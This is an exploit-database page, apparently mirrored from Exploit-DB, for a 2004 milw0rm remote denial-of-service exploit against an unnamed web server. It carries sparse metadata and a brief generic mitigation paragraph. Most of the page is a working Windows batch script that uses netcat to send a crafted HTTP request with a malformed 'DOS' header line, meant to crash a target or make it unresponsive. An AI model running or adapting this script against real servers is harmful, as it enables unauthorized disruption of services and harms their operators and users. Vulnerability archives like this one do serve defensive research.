header-logo
Suggest Exploit
vendor:
by:
Unknown
5.5
CVSS
MEDIUM
Denial of Service (DOS)
400
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

Remote Denial of Service (DOS) Exploit

This exploit allows an attacker to perform a remote Denial of Service (DOS) attack on a target system. It sends a specially crafted HTTP request to the target, causing it to become unresponsive or crash.

Mitigation:

To mitigate this vulnerability, it is recommended to apply patches or updates provided by the vendor. Additionally, implementing proper network security measures can help protect against DOS attacks.
Source

Exploit-DB raw data:

if '%1'=='' echo Usage:%0 target [port]&&goto :eof
set PORT=80
if not '%2'=='' set PORT=%2
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof
echo GET / HTTP/1.0>http.tmp
echo HOST: %1>>http.tmp
echo DOS>>http.tmp
echo.>>http.tmp
nc -w 10 %1 %PORT% < http.tmp
del http.tmp

# milw0rm.com [2004-07-22]